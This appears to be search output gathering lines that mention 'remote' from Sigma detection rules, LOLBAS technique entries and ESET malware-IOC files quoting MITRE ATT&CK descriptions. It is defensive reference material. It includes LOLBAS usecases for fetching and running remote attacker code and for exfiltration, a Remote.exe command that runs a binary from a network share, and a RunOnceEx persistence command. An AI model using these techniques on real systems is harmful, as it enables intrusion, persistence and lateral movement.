sigma proc_creation_win_susp_netsh_command.yml description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems DRL 1.0
sigma proc_creation_win_susp_network_command.yml description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems DRL 1.0
sigma proc_creation_win_susp_network_listing_connections.yml description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. DRL 1.0
sigma proc_creation_win_susp_nmap.yml description: Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation DRL 1.0
sigma proc_creation_win_susp_plink_remote_forward.yml title: Suspicious Plink Remote Forwarding DRL 1.0
sigma proc_creation_win_susp_plink_remote_forward.yml description: Detects suspicious Plink tunnel remote forwarding to a local port DRL 1.0
sigma proc_creation_win_susp_plink_remote_forward.yml - https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d DRL 1.0
sigma proc_creation_win_susp_plink_remote_forward.yml - Administrative activity using a remote port forwarding to a local port DRL 1.0
sigma proc_creation_win_susp_print.yml description: Attackers can use print.exe for remote file copy DRL 1.0
sigma proc_creation_win_susp_rclone_execution.yml - 'remote' DRL 1.0
sigma proc_creation_win_susp_regsvr32_http_pattern.yml description: Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and an IP address rather than an FQDN DRL 1.0
sigma proc_creation_win_susp_screenconnect_access.yml title: ScreenConnect Remote Access DRL 1.0
sigma proc_creation_win_susp_screenconnect_access.yml description: Detects ScreenConnect program starts that establish remote access to that system (not meeting, not remote support) DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution DRL 1.0
sigma proc_creation_win_susp_sharpview.yml description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems DRL 1.0
sigma proc_creation_win_susp_winrm_execution.yml title: Remote Code Execute via Winrm.vbs DRL 1.0
sigma proc_creation_win_susp_winrm_execution.yml description: Detects an attempt to execute code or create service on remote host via winrm.vbs. DRL 1.0
sigma proc_creation_win_vul_java_remote_debugging.yml title: Java Running with Remote Debugging DRL 1.0
sigma proc_creation_win_vul_java_remote_debugging.yml description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect DRL 1.0
sigma proc_creation_win_webshell_detection.yml - 'dir \' # remote dir: dir \<redacted IP #3>\C$:\windows\temp\*.exe DRL 1.0
sigma proc_creation_win_wmic_remote_service.yml title: WMI Reconnaissance List Remote Services DRL 1.0
sigma proc_creation_win_wmic_remote_service.yml An adversary might use WMI to check if a certain Remote Service is running on a remote device. DRL 1.0
sigma proc_creation_win_wmic_remote_service.yml A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable DRL 1.0
sigma registry_event_change_rdp_port.yml Remote desktop is a common feature in operating systems. DRL 1.0
sigma registry_event_change_rdp_port.yml It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. DRL 1.0
sigma registry_event_change_rdp_port.yml Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). DRL 1.0
sigma registry_event_disable_administrative_share.yml description: Administrative shares are hidden network shares created by Microsoft’s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system DRL 1.0
sigma registry_event_hybridconnectionmgr_svc_installation.yml description: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function. DRL 1.0
sigma registry_event_mstsc_history_cleared.yml - https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer DRL 1.0
sigma registry_event_rdp_registry_modification.yml description: Detects potential malicious modification of the property value of fDenyTSConnections and UserAuthentication to enable remote desktop connections. DRL 1.0
sigma win_dumping_ntdsdit_via_dcsync.yml description: Retrieving ntds.dit using synchronisation with a legitimate domain controller via the Directory Replication Service Remote Protocol DRL 1.0
sigma win_dumping_ntdsdit_via_netsync.yml description: Retrieving ntds.dit (only computer accounts) using synchronisation with a legitimate domain controller via the Netlogon Remote Protocol DRL 1.0
sigma win_remote_schtask.yml title: Remote Schtasks Creation DRL 1.0
sigma win_remote_schtask.yml description: Detects remote execution via scheduled task creation or update on the destination host DRL 1.0
sigma win_remote_schtask.yml # By having this you can group logon events to their remote schtask creation event (as it is searching for a logon followed by a schtask creation) even by using a search timeframe over a long period of time e.g. 30days without running the risk of incorrectly grouping a logonID at one time, to a task creation at another. DRL 1.0
sigma win_remote_service.yml title: Remote Service Creation DRL 1.0
sigma win_remote_service.yml description: Detects remote execution via service creation on the destination host DRL 1.0
sigma win_remote_service.yml # By having this you can group logon events to their remote service creation event (as it is searching for a logon followed by a service creation) even by using a search timeframe over a long period of time e.g. 30days without running the risk of incorrectly grouping a logonID at one time, to a task creation at another. DRL 1.0
sigma hawk.yml windows-create-remote-thread: DRL 1.0
sigma qualys.yml - network.remote.address.ip DRL 1.0
LOLBAS Netsh.yml Description: Capture network traffic on remote file share.  
LOLBAS Netsh.yml Description: Forward traffic from the listening address and proxy to a remote system.  
LOLBAS Cmstp.yml Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.  
LOLBAS Diantz.yml Description: Download and compress a remote file and store it in a cab file on local machine.  
LOLBAS Diantz.yml - IOC: diantz getting a file from a remote machine or the internet.  
LOLBAS Esentutl.yml Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.  
LOLBAS Finger.yml Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon  
LOLBAS Finger.yml Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'  
LOLBAS GfxDownloadWrapper.yml Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.  
LOLBAS Ieexec.yml Description: Downloads and executes bypass.exe from the remote server.  
LOLBAS Ieexec.yml Usecase: Download and run attacker code from remote location  
LOLBAS MpCmdRun.yml - IOC: MpCmdRun retrieving a file from a remote machine or the internet that is not expected.  
LOLBAS Msiexec.yml Description: Installs the target remote & renamed .MSI file silently.  
LOLBAS Msiexec.yml Usecase: Execute custom made msi file with attack code from remote server  
LOLBAS Pcalua.yml Usecase: Proxy execution of remote dll file  
LOLBAS Print.yml Usecase: Copy/Download file from remote server  
LOLBAS PrintBrm.yml Description: Create a ZIP file from a folder in a remote drive  
LOLBAS PrintBrm.yml Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file  
LOLBAS Rasautou.yml Description: Windows Remote Access Dialer  
LOLBAS Regsvr32.yml Description: Execute the specified remote .SCT script with scrobj.dll.  
LOLBAS Regsvr32.yml Usecase: Execute code from remote scriptlet, bypass Application whitelisting  
LOLBAS Replace.yml - IOC: Replace.exe retrieving files from remote server  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.  
LOLBAS Schtasks.yml Description: Create a scheduled task on a remote computer for persistence/lateral movement  
LOLBAS Schtasks.yml Usecase: Create a remote task to run daily relative to the time of creation  
LOLBAS Scriptrunner.yml Description: Executes calc.cmd from remote server  
LOLBAS Wmic.yml Description: Execute evil.exe on the remote system.  
LOLBAS Wmic.yml Usecase: Execute binary on a remote system  
LOLBAS Wmic.yml Usecase: Execute binary with scheduled task created with wmic on a remote computer  
LOLBAS Wmic.yml Usecase: Execute binary on remote system  
LOLBAS Wmic.yml Description: Executes JScript or VBScript embedded in the target remote XSL stylesheet.  
LOLBAS Wmic.yml Usecase: Execute script from remote system  
LOLBAS Wmic.yml - IOC: Wmic retrieving scripts from remote system/Internet location  
LOLBAS Advpack.yml Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).  
LOLBAS Advpack.yml Usecase: Run local or remote script(let) code through INF file specification.  
LOLBAS Advpack.yml Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).  
LOLBAS Ieadvpack.yml Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).  
LOLBAS Ieadvpack.yml Usecase: Run local or remote script(let) code through INF file specification.  
LOLBAS Ieadvpack.yml Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).  
LOLBAS Setupapi.yml Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).  
LOLBAS Setupapi.yml UseCase: Run local or remote script(let) code through INF file specification.  
LOLBAS Syssetup.yml Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).  
LOLBAS Syssetup.yml Usecase: Run local or remote script(let) code through INF file specification (Note: may pop an error window).  
LOLBAS Winrm.yml Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol  
LOLBAS Winrm.yml Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol  
LOLBAS Bginfo.yml Usecase: Remote execution of VBScript  
LOLBAS Excel.yml Description: Downloads payload from remote server  
LOLBAS Excel.yml Usecase: It will download a remote payload and place it in the cache folder  
LOLBAS Msxsl.yml Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).  
LOLBAS Msxsl.yml Usecase: Local execution of remote script stored in XSL script stored as an XML file.  
LOLBAS Powerpnt.yml Description: Downloads payload from remote server  
LOLBAS Powerpnt.yml Usecase: It will download a remote payload and place it in the cache folder  
LOLBAS Remote.yml Name: Remote.exe  
LOLBAS Remote.yml - Command: Remote.exe /s "powershell.exe" anythinghere  
LOLBAS Remote.yml Description: Spawns powershell as a child process of remote.exe  
LOLBAS Remote.yml - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere  
LOLBAS Remote.yml Description: Run a remote file  
LOLBAS Remote.yml Usecase: Executing a remote binary without saving file to disk  
LOLBAS Remote.yml - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe  
LOLBAS Remote.yml - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe  
LOLBAS Remote.yml - IOC: remote.exe process spawns  
LOLBAS Remote.yml - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/  
LOLBAS Winword.yml Description: Downloads payload from remote server  
LOLBAS Winword.yml Usecase: It will download a remote payload and place it in the cache folder  
malware-ioc misp-badiis.json "remote-service-effects" © ESET 2014-2018
malware-ioc misp-badiis.json "https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/", © ESET 2014-2018
malware-ioc misp-badiis.json "description": "Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)\n\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)\n\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", © ESET 2014-2018
malware-ioc misp-badiis.json "description": "Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)\n\nAs with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.\n\nSome aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)", © ESET 2014-2018
malware-ioc misp-badiis.json "description": "Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.\n\nIn addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).", © ESET 2014-2018
malware-ioc misp-badiis.json "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.", © ESET 2014-2018
malware-ioc misp-badiis.json "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)", © ESET 2014-2018
malware-ioc misp-badiis.json "description": "Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nThe DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) ", © ESET 2014-2018
malware-ioc misp-badiis.json "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", © ESET 2014-2018
malware-ioc misp-badiis.json "value": "Remote File Copy - T1105", © ESET 2014-2018
malware-ioc misp-badiis.json "tag_name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Remote File Copy - T1105\"", © ESET 2014-2018
malware-ioc misp-badiis.json "description": "Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.\n\nAdversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with Windows Admin Shares or Remote Desktop Protocol.\n\nDetection: Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: File monitoring, Packet capture, Process use of network, Netflow/Enclave netflow, Network protocol analysis, Process monitoring\n\nPermissions Required: User\n\nRequires Network: Yes", © ESET 2014-2018
malware-ioc misp-badiis.json "name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Remote File Copy - T1105\"", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "remote-service-effects" © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access. \n\nAccounts that an adversary may use can fall into three categories: default, local, and domain accounts. Default accounts are those that are built-into an OS such as Guest or Administrator account on Windows systems or default factory/provider set accounts on other types of systems, software, or devices. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. (Citation: Microsoft Local Accounts Feb 2019) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.\n\nCompromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nDefault accounts are also not limited to Guest and Administrator on client machines, they also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or COTS. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed private keys, or stolen private keys, to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021) (Citation: Metasploit SSH Module)\n\nThe overlap of account access, credentials, and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, [Scripting](https://attack.mitre.org/techniques/T1064), [PowerShell](https://attack.mitre.org/techniques/T1086), or by using utilities present on the system.\n\nOne such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia)\n\nAnother example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication.", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n\nThe <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: <code>reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "Utilities such as [at](https://attack.mitre.org/software/S0110) and [schtasks](https://attack.mitre.org/software/S0111), along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically requires being a member of the Administrators group on the remote system. (Citation: TechNet Task Scheduler Security)\n\nAn adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration.\n\nAdversaries may search network shares on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\n### Windows\n\nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder)\n\n[Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the <code>net view \\\\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>.\n\nAdversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.\n\n### Mac\n\nOn Mac, locally mounted shares can be viewed with the <code>df -aH</code> command.", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n\nFor connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \n\n### Windows\n\nUtilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), \"net use,\" and \"net session\" with [Net](https://attack.mitre.org/software/S0039).\n\n### Mac and Linux \n\nIn Mac and Linux, <code>netstat</code> and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to \"net session\".", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include <code>C$</code>, <code>ADMIN$</code>, and <code>IPC$</code>. \n\nAdversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares)\n\nThe [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using <code>net use</code> commands with valid credentials. (Citation: Technet Net Use)", © ESET 2014-2018
malware-ioc evilnum 476BB78BCF194523C385E2CEE364D6D097464ECA hi.txt (remote scriptlet) © ESET 2014-2018
malware-ioc misp_invisimole.json "remote-service-effects" © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly use to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1192). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193), [Spearphishing Link](https://attack.mitre.org/techniques/T1192), and [Spearphishing via Service](https://attack.mitre.org/techniques/T1194). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.", © ESET 2014-2018
